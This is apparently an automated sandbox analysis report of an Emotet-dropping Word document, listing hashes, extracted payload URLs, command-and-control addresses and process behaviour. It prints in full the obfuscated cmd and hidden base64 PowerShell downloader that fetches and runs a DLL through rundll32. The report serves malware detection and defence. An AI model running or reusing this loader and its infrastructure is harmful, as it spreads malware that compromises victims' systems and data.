Analysis
-
max time kernel
139s -
max time network
137s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-02-2021 07:36
Behavioral task
behavioral1
Sample
9092846dece6e79c44ca875d45bac88bdd2f251cacc31279566e30387bff2371.doc
Resource
win7v20201028
General
-
Target
9092846dece6e79c44ca875d45bac88bdd2f251cacc31279566e30387bff2371.doc
-
Size
159KB
-
MD5
c8857c120f2a6609fb03f3a94f79df2d
-
SHA1
0f01c1feab662983a38f0d1395f2704b9c2eea86
-
SHA256
9092846dece6e79c44ca875d45bac88bdd2f251cacc31279566e30387bff2371
-
SHA512
cecba70eba96802f7c6c8eaf60f0a0549a58f9d45418579c02d42d76e46e4f24c9b9fba6cf4cddb24ce0fd17e7231500319a7a40ae6ea6e67d1b6bff846e17a4
Malware Config
Extracted
https://office.horussolution.com/files/Help/
http://18.179.187.145/licenses/Sys/
https://malaysianscoop.com/img/MSInfo/
https://luoyb.com/wp-includes/rUhBVqXWAV/
http://uk-bet.com/wp-content/Media/
http://somatone.atakdev.com/plesk-stat/Stationery/
Extracted
emotet
Epoch3
113.161.176.235:80
88.247.30.64:80
89.163.210.141:8080
139.162.10.249:8080
203.157.152.9:7080
109.99.146.210:8080
78.90.78.210:80
172.193.14.201:80
157.7.164.178:8081
189.211.214.19:443
157.245.145.87:443
180.148.4.130:8080
46.32.229.152:8080
24.245.65.66:80
82.78.179.117:443
177.130.51.198:80
121.117.147.153:443
203.160.167.243:80
172.104.46.84:8080
202.29.237.113:8080
163.53.204.180:443
91.75.75.46:80
103.124.152.221:80
143.95.101.72:8080
178.153.27.12:80
192.210.217.94:8080
5.79.70.250:8080
183.91.3.63:80
103.80.51.61:8080
46.105.131.68:8080
203.153.216.178:7080
190.85.46.52:7080
152.32.75.74:443
120.51.34.254:80
117.2.139.117:443
192.241.220.183:8080
70.32.89.105:8080
175.103.38.146:80
24.230.124.78:80
178.62.254.156:8080
54.38.143.245:8080
188.226.165.170:8080
139.59.61.215:443
223.17.215.76:80
75.127.14.170:8080
103.229.73.17:8080
178.33.167.120:8080
172.96.190.154:8080
186.146.229.172:80
116.202.10.123:8080
77.89.249.254:443
114.158.126.84:80
182.73.7.59:8080
203.56.191.129:8080
139.59.12.63:8080
47.150.238.196:80
190.18.184.113:80
115.79.195.246:80
162.144.145.58:8080
69.159.11.38:443
2.58.16.86:8080
195.159.28.244:8080
60.108.128.186:80
110.172.180.180:8080
139.5.101.203:80
195.201.56.70:8080
110.37.224.243:80
79.133.6.236:8080
8.4.9.137:8080
185.208.226.142:8080
201.212.201.127:8080
2.82.75.215:80
201.193.160.196:80
37.46.129.215:8080
85.247.144.202:80
50.116.78.109:8080
189.34.18.252:8080
178.254.36.182:8080
103.93.220.182:80
113.203.238.130:80
58.27.215.3:8080
180.52.66.193:80
188.166.220.180:7080
37.205.9.252:7080
74.208.173.91:8080
198.20.228.9:8080
185.142.236.163:443
73.55.128.120:80
192.163.221.191:8080
91.83.93.103:443
5.83.32.101:80
186.96.170.61:80
27.78.27.110:443
Extracted
emotet
LEA
80.158.3.161:443
80.158.51.209:8080
80.158.35.51:80
80.158.63.78:443
80.158.53.167:80
80.158.62.194:443
80.158.59.174:8080
80.158.43.136:80
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 644 4060 cmd.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exerundll32.exerundll32.exeflow pid process 22 1600 powershell.exe 31 1496 rundll32.exe 32 1496 rundll32.exe 39 1496 rundll32.exe 40 196 rundll32.exe -
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 2240 rundll32.exe 596 rundll32.exe -
Drops file in System32 directory 3 IoCs
Processes:
rundll32.exerundll32.exerundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Gqxsahuwi\jhdacxkf.pxk rundll32.exe File created C:\Windows\SysWOW64\Gqxsahuwi\wbxfxbdzrorbrig.dll rundll32.exe File opened for modification C:\Windows\SysWOW64\Gqxsahuwi\jhdacxkf.pxk rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 496 WINWORD.EXE 496 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exerundll32.exerundll32.exerundll32.exepid process 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1496 rundll32.exe 1496 rundll32.exe 1496 rundll32.exe 1496 rundll32.exe 1496 rundll32.exe 1496 rundll32.exe 1496 rundll32.exe 1496 rundll32.exe 1496 rundll32.exe 1496 rundll32.exe 596 rundll32.exe 596 rundll32.exe 196 rundll32.exe 196 rundll32.exe 196 rundll32.exe 196 rundll32.exe 196 rundll32.exe 196 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1600 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
cmd.exepowershell.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 644 wrote to memory of 2216 644 cmd.exe msg.exe PID 644 wrote to memory of 2216 644 cmd.exe msg.exe PID 644 wrote to memory of 1600 644 cmd.exe powershell.exe PID 644 wrote to memory of 1600 644 cmd.exe powershell.exe PID 1600 wrote to memory of 3132 1600 powershell.exe rundll32.exe PID 1600 wrote to memory of 3132 1600 powershell.exe rundll32.exe PID 3132 wrote to memory of 2240 3132 rundll32.exe rundll32.exe PID 3132 wrote to memory of 2240 3132 rundll32.exe rundll32.exe PID 3132 wrote to memory of 2240 3132 rundll32.exe rundll32.exe PID 2240 wrote to memory of 1496 2240 rundll32.exe rundll32.exe PID 2240 wrote to memory of 1496 2240 rundll32.exe rundll32.exe PID 2240 wrote to memory of 1496 2240 rundll32.exe rundll32.exe PID 1496 wrote to memory of 596 1496 rundll32.exe rundll32.exe PID 1496 wrote to memory of 596 1496 rundll32.exe rundll32.exe PID 1496 wrote to memory of 596 1496 rundll32.exe rundll32.exe PID 596 wrote to memory of 196 596 rundll32.exe rundll32.exe PID 596 wrote to memory of 196 596 rundll32.exe rundll32.exe PID 596 wrote to memory of 196 596 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9092846dece6e79c44ca875d45bac88bdd2f251cacc31279566e30387bff2371.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0AaQBUAEUATQAgACAAdgBBAHIASQBhAGIAbABFADoAbAA4ADAAcgAgACAAKABbAFQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAzAH0AewAwAH0AewAyAH0AIgAgAC0ARgAgACcARABJAHIAZQBDAFQAJwAsACcAcwBZAFMAVABFACcALAAnAE8AUgB5ACcALAAnAEkAbwAuACcALAAnAE0ALgAnACkAKQA7ACAAIAAkAHAAWQBaAHcAQgAgAD0AIAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADMAfQB7ADAAfQB7ADEAfQB7ADUAfQB7ADIAfQAiAC0ARgAnAEkAJwAsACcAYwBlACcALAAnAEcAZQBSACcALAAnAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBzAFkAUwB0AEUAbQAuACcALAAnAHAATwBpAG4AVABNAEEAbgBBACcAKQAgACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQAnACsAJwBsAGUAbgAnACkAKwAnAHQAbAAnACsAJwB5ACcAKwAoACcAQwBvACcAKwAnAG4AJwArACcAdABpAG4AJwApACsAJwB1AGUAJwApADsAJABXAGQANwBhADgAcQAwAD0AJABZADUAOABPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADYANgBKADsAJABBAF8ANgBYAD0AKAAnAFoAJwArACgAJwA0ADgAJwArACcAQgAnACkAKQA7ACAAIAAoAEcARQB0AC0ASQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABFADoATAA4ADAAUgAgACkALgB2AGEAbAB1AGUAOgA6ACIAYwByAEUAQQBUAEUARABJAGAAUgBgAGUAYwBgAFQAYABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHkARwAnACsAJwBpAEoAJwArACgAJwBnAF8AcABmAGYAJwArACcAegB5ACcAKwAnAEcAaQBMACcAKQArACcAbAAnACsAJwBjACcAKwAnAGgAJwArACgAJwB3AHUAJwArACcAbgAnACkAKwAoACcAeQBHACcAKwAnAGkAJwApACkAIAAtAEMAUgBlAHAAbABBAEMARQAgACAAKAAnAHkARwAnACsAJwBpACcAKQAsAFsAYwBIAEEAcgBdADkAMgApACkAOwAkAFIANQBfAFUAPQAoACgAJwBWADAAJwArACcAOAAnACkAKwAnAFYAJwApADsAIAAgACQAcABZAHoAdwBCADoAOgAiAFMAYABFAEMAYABVAFIAaQB0AFkAcABSAG8AdABvAGMATwBsACIAIAA9ACAAKAAoACcAVABsAHMAJwArACcAMQAnACkAKwAnADIAJwApADsAJABNADQAOABTAD0AKAAnAEwAOQAnACsAJwA1AFQAJwApADsAJABaAHUAaQBrAGEANwB5ACAAPQAgACgAJwBSADYAJwArACcAMQBTACcAKQA7ACQAVQAwADYAVwA9ACgAKAAnAFgAMAAnACsAJwA2ACcAKQArACcAUAAnACkAOwAkAEwAawBwAHEAXwB5ADUAPQAkAEgATwBNAEUAKwAoACgAJwB7ACcAKwAnADAAfQBKAGcAXwBwAGYAZgAnACsAJwB6AHsAMAB9AEwAJwArACcAbABjAGgAdwB1AG4AewAwACcAKwAnAH0AJwApACAALQBGAFsAYwBoAEEAUgBdADkAMgApACsAJABaAHUAaQBrAGEANwB5ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATwA2ADAAUgA9ACgAJwBYACcAKwAoACcAOQA4ACcAKwAnAFgAJwApACkAOwAkAFUAMwB0AHkAZABnAGIAPQAoACgAJwBdAGUAMQByAFsAJwArACcAUwBzACcAKQArACcAOgAvACcAKwAoACcALwBvAGYAZgBpACcAKwAnAGMAJwApACsAKAAnAGUALgBoACcAKwAnAG8AcgB1ACcAKQArACgAJwBzACcAKwAnAHMAbwAnACsAJwBsAHUAdAAnACsAJwBpAG8AJwArACcAbgAuAGMAbwAnACsAJwBtAC8AZgAnACsAJwBpAGwAZQBzAC8AJwApACsAKAAnAEgAJwArACcAZQBsAHAALwAnACkAKwAoACcAQAAnACsAJwBdAGUAMQByAFsAUwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAMQA4AC4AMQA3ACcAKQArACgAJwA5AC4AJwArACcAMQAnACkAKwAoACcAOAA3ACcAKwAnAC4AJwApACsAJwAxADQAJwArACgAJwA1ACcAKwAnAC8AbAAnACkAKwAoACcAaQBjACcAKwAnAGUAbgBzAGUAcwAnACsAJwAvAFMAeQAnACkAKwAoACcAcwAvAEAAXQAnACsAJwBlACcAKQArACgAJwAxAHIAWwAnACsAJwBTAHMAOgAvACcAKwAnAC8AJwApACsAJwBtACcAKwAoACcAYQBsACcAKwAnAGEAeQAnACkAKwAnAHMAJwArACcAaQAnACsAKAAnAGEAJwArACcAbgBzAGMAbwBvAHAAJwApACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAaQAnACsAKAAnAG0AJwArACcAZwAvAE0AJwApACsAJwBTAEkAJwArACcAbgAnACsAJwBmACcAKwAoACcAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AZQAxAHIAWwAnACsAJwBTACcAKQArACcAcwAnACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAJwB1ACcAKwAoACcAbwB5ACcAKwAnAGIALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBpAG4AJwArACcAYwAnACsAJwBsAHUAJwApACsAJwBkACcAKwAoACcAZQAnACsAJwBzAC8AcgBVACcAKQArACgAJwBoACcAKwAnAEIAVgBxAFgAJwArACcAVwAnACkAKwAoACcAQQBWACcAKwAnAC8AQABdAGUAMQByAFsAJwArACcAUwAnACkAKwAoACcAOgAvAC8AdQAnACsAJwBrACcAKQArACgAJwAtACcAKwAnAGIAZQB0AC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AdwBwAC0AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQALwBNACcAKwAnAGUAJwApACsAKAAnAGQAaQBhACcAKwAnAC8AQAAnACkAKwAoACcAXQBlACcAKwAnADEAJwApACsAKAAnAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwBzACcAKwAnAG8AJwArACcAbQBhAHQAbwAnACkAKwAnAG4AZQAnACsAKAAnAC4AYQB0AGEAawAnACsAJwBkAGUAdgAnACsAJwAuAGMAbwBtAC8AcAAnACsAJwBsAGUAcwBrAC0AJwApACsAJwBzAHQAJwArACcAYQAnACsAJwB0ACcAKwAnAC8AUwAnACsAKAAnAHQAYQB0AGkAbwBuACcAKwAnAGUAcgB5ACcAKwAnAC8AJwApACkALgAiAFIAYABFAFAAbABhAEMARQAiACgAKAAnAF0AZQAnACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAJwArACgAJwB0AHQAJwArACcAcAAnACkAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBzAHAAYABsAEkAVAAiACgAJABTADMAOQBXACAAKwAgACQAVwBkADcAYQA4AHEAMAAgACsAIAAkAEcAMABfAE0AKQA7ACQARAA0ADMAUgA9ACgAJwBZACcAKwAoACcANAAwACcAKwAnAFQAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAYQB1ADcAYQBvADgAIABpAG4AIAAkAFUAMwB0AHkAZABnAGIAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtAE8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAHMAeQBzAHQARQBtAC4AbgBlAFQALgB3AEUAYgBDAEwASQBlAE4AVAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABGAGAASQBgAGwAZQAiACgAJABKAGEAdQA3AGEAbwA4ACwAIAAkAEwAawBwAHEAXwB5ADUAKQA7ACQAUAAwADIARwA9ACgAJwBZADAAJwArACcAOQBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABMAGsAcABxAF8AeQA1ACkALgAiAGwAYABlAG4ARwB0AEgAIgAgAC0AZwBlACAANAAzADkANgA0ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAEwAawBwAHEAXwB5ADUALAAoACcAQwBvACcAKwAnAG4AJwArACgAJwB0ACcAKwAnAHIAbwBsACcAKQArACcAXwBSACcAKwAoACcAdQBuAEQATAAnACsAJwBMACcAKQApAC4AIgB0AG8AcwB0AGAAUgBpAE4ARwAiACgAKQA7ACQAVwAyADkASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAFYAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkAXwA2AEoAPQAoACgAJwBIADMAJwArACcANwAnACkAKwAnAEUAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADAANABJAD0AKAAoACcAQgAnACsAJwA3ADQAJwApACsAJwBCACcAKQA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0AaQBUAEUATQAgACAAdgBBAHIASQBhAGIAbABFADoAbAA4ADAAcgAgACAAKABbAFQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAzAH0AewAwAH0AewAyAH0AIgAgAC0ARgAgACcARABJAHIAZQBDAFQAJwAsACcAcwBZAFMAVABFACcALAAnAE8AUgB5ACcALAAnAEkAbwAuACcALAAnAE0ALgAnACkAKQA7ACAAIAAkAHAAWQBaAHcAQgAgAD0AIAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADMAfQB7ADAAfQB7ADEAfQB7ADUAfQB7ADIAfQAiAC0ARgAnAEkAJwAsACcAYwBlACcALAAnAEcAZQBSACcALAAnAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBzAFkAUwB0AEUAbQAuACcALAAnAHAATwBpAG4AVABNAEEAbgBBACcAKQAgACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQAnACsAJwBsAGUAbgAnACkAKwAnAHQAbAAnACsAJwB5ACcAKwAoACcAQwBvACcAKwAnAG4AJwArACcAdABpAG4AJwApACsAJwB1AGUAJwApADsAJABXAGQANwBhADgAcQAwAD0AJABZADUAOABPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADYANgBKADsAJABBAF8ANgBYAD0AKAAnAFoAJwArACgAJwA0ADgAJwArACcAQgAnACkAKQA7ACAAIAAoAEcARQB0AC0ASQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABFADoATAA4ADAAUgAgACkALgB2AGEAbAB1AGUAOgA6ACIAYwByAEUAQQBUAEUARABJAGAAUgBgAGUAYwBgAFQAYABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHkARwAnACsAJwBpAEoAJwArACgAJwBnAF8AcABmAGYAJwArACcAegB5ACcAKwAnAEcAaQBMACcAKQArACcAbAAnACsAJwBjACcAKwAnAGgAJwArACgAJwB3AHUAJwArACcAbgAnACkAKwAoACcAeQBHACcAKwAnAGkAJwApACkAIAAtAEMAUgBlAHAAbABBAEMARQAgACAAKAAnAHkARwAnACsAJwBpACcAKQAsAFsAYwBIAEEAcgBdADkAMgApACkAOwAkAFIANQBfAFUAPQAoACgAJwBWADAAJwArACcAOAAnACkAKwAnAFYAJwApADsAIAAgACQAcABZAHoAdwBCADoAOgAiAFMAYABFAEMAYABVAFIAaQB0AFkAcABSAG8AdABvAGMATwBsACIAIAA9ACAAKAAoACcAVABsAHMAJwArACcAMQAnACkAKwAnADIAJwApADsAJABNADQAOABTAD0AKAAnAEwAOQAnACsAJwA1AFQAJwApADsAJABaAHUAaQBrAGEANwB5ACAAPQAgACgAJwBSADYAJwArACcAMQBTACcAKQA7ACQAVQAwADYAVwA9ACgAKAAnAFgAMAAnACsAJwA2ACcAKQArACcAUAAnACkAOwAkAEwAawBwAHEAXwB5ADUAPQAkAEgATwBNAEUAKwAoACgAJwB7ACcAKwAnADAAfQBKAGcAXwBwAGYAZgAnACsAJwB6AHsAMAB9AEwAJwArACcAbABjAGgAdwB1AG4AewAwACcAKwAnAH0AJwApACAALQBGAFsAYwBoAEEAUgBdADkAMgApACsAJABaAHUAaQBrAGEANwB5ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATwA2ADAAUgA9ACgAJwBYACcAKwAoACcAOQA4ACcAKwAnAFgAJwApACkAOwAkAFUAMwB0AHkAZABnAGIAPQAoACgAJwBdAGUAMQByAFsAJwArACcAUwBzACcAKQArACcAOgAvACcAKwAoACcALwBvAGYAZgBpACcAKwAnAGMAJwApACsAKAAnAGUALgBoACcAKwAnAG8AcgB1ACcAKQArACgAJwBzACcAKwAnAHMAbwAnACsAJwBsAHUAdAAnACsAJwBpAG8AJwArACcAbgAuAGMAbwAnACsAJwBtAC8AZgAnACsAJwBpAGwAZQBzAC8AJwApACsAKAAnAEgAJwArACcAZQBsAHAALwAnACkAKwAoACcAQAAnACsAJwBdAGUAMQByAFsAUwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAMQA4AC4AMQA3ACcAKQArACgAJwA5AC4AJwArACcAMQAnACkAKwAoACcAOAA3ACcAKwAnAC4AJwApACsAJwAxADQAJwArACgAJwA1ACcAKwAnAC8AbAAnACkAKwAoACcAaQBjACcAKwAnAGUAbgBzAGUAcwAnACsAJwAvAFMAeQAnACkAKwAoACcAcwAvAEAAXQAnACsAJwBlACcAKQArACgAJwAxAHIAWwAnACsAJwBTAHMAOgAvACcAKwAnAC8AJwApACsAJwBtACcAKwAoACcAYQBsACcAKwAnAGEAeQAnACkAKwAnAHMAJwArACcAaQAnACsAKAAnAGEAJwArACcAbgBzAGMAbwBvAHAAJwApACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAaQAnACsAKAAnAG0AJwArACcAZwAvAE0AJwApACsAJwBTAEkAJwArACcAbgAnACsAJwBmACcAKwAoACcAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AZQAxAHIAWwAnACsAJwBTACcAKQArACcAcwAnACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAJwB1ACcAKwAoACcAbwB5ACcAKwAnAGIALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBpAG4AJwArACcAYwAnACsAJwBsAHUAJwApACsAJwBkACcAKwAoACcAZQAnACsAJwBzAC8AcgBVACcAKQArACgAJwBoACcAKwAnAEIAVgBxAFgAJwArACcAVwAnACkAKwAoACcAQQBWACcAKwAnAC8AQABdAGUAMQByAFsAJwArACcAUwAnACkAKwAoACcAOgAvAC8AdQAnACsAJwBrACcAKQArACgAJwAtACcAKwAnAGIAZQB0AC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AdwBwAC0AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQALwBNACcAKwAnAGUAJwApACsAKAAnAGQAaQBhACcAKwAnAC8AQAAnACkAKwAoACcAXQBlACcAKwAnADEAJwApACsAKAAnAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwBzACcAKwAnAG8AJwArACcAbQBhAHQAbwAnACkAKwAnAG4AZQAnACsAKAAnAC4AYQB0AGEAawAnACsAJwBkAGUAdgAnACsAJwAuAGMAbwBtAC8AcAAnACsAJwBsAGUAcwBrAC0AJwApACsAJwBzAHQAJwArACcAYQAnACsAJwB0ACcAKwAnAC8AUwAnACsAKAAnAHQAYQB0AGkAbwBuACcAKwAnAGUAcgB5ACcAKwAnAC8AJwApACkALgAiAFIAYABFAFAAbABhAEMARQAiACgAKAAnAF0AZQAnACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAJwArACgAJwB0AHQAJwArACcAcAAnACkAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBzAHAAYABsAEkAVAAiACgAJABTADMAOQBXACAAKwAgACQAVwBkADcAYQA4AHEAMAAgACsAIAAkAEcAMABfAE0AKQA7ACQARAA0ADMAUgA9ACgAJwBZACcAKwAoACcANAAwACcAKwAnAFQAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAYQB1ADcAYQBvADgAIABpAG4AIAAkAFUAMwB0AHkAZABnAGIAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtAE8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAHMAeQBzAHQARQBtAC4AbgBlAFQALgB3AEUAYgBDAEwASQBlAE4AVAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABGAGAASQBgAGwAZQAiACgAJABKAGEAdQA3AGEAbwA4ACwAIAAkAEwAawBwAHEAXwB5ADUAKQA7ACQAUAAwADIARwA9ACgAJwBZADAAJwArACcAOQBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABMAGsAcABxAF8AeQA1ACkALgAiAGwAYABlAG4ARwB0AEgAIgAgAC0AZwBlACAANAAzADkANgA0ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAEwAawBwAHEAXwB5ADUALAAoACcAQwBvACcAKwAnAG4AJwArACgAJwB0ACcAKwAnAHIAbwBsACcAKQArACcAXwBSACcAKwAoACcAdQBuAEQATAAnACsAJwBMACcAKQApAC4AIgB0AG8AcwB0AGAAUgBpAE4ARwAiACgAKQA7ACQAVwAyADkASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAFYAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkAXwA2AEoAPQAoACgAJwBIADMAJwArACcANwAnACkAKwAnAEUAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADAANABJAD0AKAAoACcAQgAnACsAJwA3ADQAJwApACsAJwBCACcAKQA=2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Jg_pffz\Llchwun\R61S.dll,Control_RunDLL3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Jg_pffz\Llchwun\R61S.dll,Control_RunDLL4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gqxsahuwi\jhdacxkf.pxk",Control_RunDLL5⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gqxsahuwi\wbxfxbdzrorbrig.dll",Control_RunDLL pAIAAC4AAABHAHEAeABzAGEAaAB1AHcAaQBcAGoAaABkAGEAYwB4AGsAZgAuAHAAeABrAAAA6⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gqxsahuwi\jhdacxkf.pxk",Control_RunDLL7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Jg_pffz\Llchwun\R61S.dllMD5
3cc696c301c3458b16d3fc39ceb92965
SHA1b202378a54eb660b74fa6be1e627d9b80e262dbe
SHA256f60a367863fb0eaecddb98f29eb44b8f885c027684d441dc5d79cf2f33d65563
SHA51263598ea970d06f3095ad4f7dd70d1ecfc3d65bb4f90ad6b5fdf4d2fcc3e51f54fe705c060de5d95375c5b15495007c65fe60d23877c57abe596a7d473c588fd7
-
C:\Windows\SysWOW64\Gqxsahuwi\wbxfxbdzrorbrig.dllMD5
9a062ead5b2d55af0a5a4b39c5b5eadc
SHA1fc83367be87c700a696b0329dab538b5e47d90bf
SHA256a9c68d527223db40014d067cf4fdae5be46cca67387e9cfdff118276085f23ef
SHA512693ab862c7e3c5dad3ca3d44bbc4a5a4c2391ff558e02e86e4c1d7d1fa7c00b4acf1c426ca619dea2b422997caaf1f0ecba37ec0ffca19edaca297005c9ad861
-
\Users\Admin\Jg_pffz\Llchwun\R61S.dllMD5
3cc696c301c3458b16d3fc39ceb92965
SHA1b202378a54eb660b74fa6be1e627d9b80e262dbe
SHA256f60a367863fb0eaecddb98f29eb44b8f885c027684d441dc5d79cf2f33d65563
SHA51263598ea970d06f3095ad4f7dd70d1ecfc3d65bb4f90ad6b5fdf4d2fcc3e51f54fe705c060de5d95375c5b15495007c65fe60d23877c57abe596a7d473c588fd7
-
\Windows\SysWOW64\Gqxsahuwi\wbxfxbdzrorbrig.dllMD5
9a062ead5b2d55af0a5a4b39c5b5eadc
